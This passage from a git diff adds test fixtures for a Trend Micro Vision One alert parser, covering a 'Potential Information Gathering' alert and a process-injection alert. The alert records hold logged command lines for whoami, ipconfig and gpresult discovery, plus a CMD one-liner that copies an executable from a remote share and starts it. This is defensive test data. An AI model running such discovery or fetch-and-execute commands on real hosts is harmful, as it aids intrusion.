[\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index b31951fe2..5b8dbfc95 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -24,6 +24,7 @@ "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" }, "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", "ip": [ "1.2.3.4" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 9c013b1c0..9a41ea92c 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -24,6 +24,7 @@ "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" }, "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", "ip": [ "10.10.58.51" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json new file mode 100644 index 000000000..dbeed8e8e --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S 